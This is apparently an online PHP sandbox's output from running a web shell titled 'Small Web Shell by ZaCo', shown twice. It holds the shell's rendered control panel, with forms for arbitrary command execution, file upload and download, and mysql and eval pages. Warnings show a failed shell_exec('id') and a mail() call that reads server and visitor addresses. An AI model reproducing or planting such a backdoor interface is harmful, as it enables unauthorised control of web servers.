Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip 
archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr>Error Listing /
Output for 5.4.0 - 5.4.45, 5.5.0 - 5.5.38, 5.6.0 - 5.6.25, 7.0.0 - 7.0.10
Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without 
arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr>Error Listing /
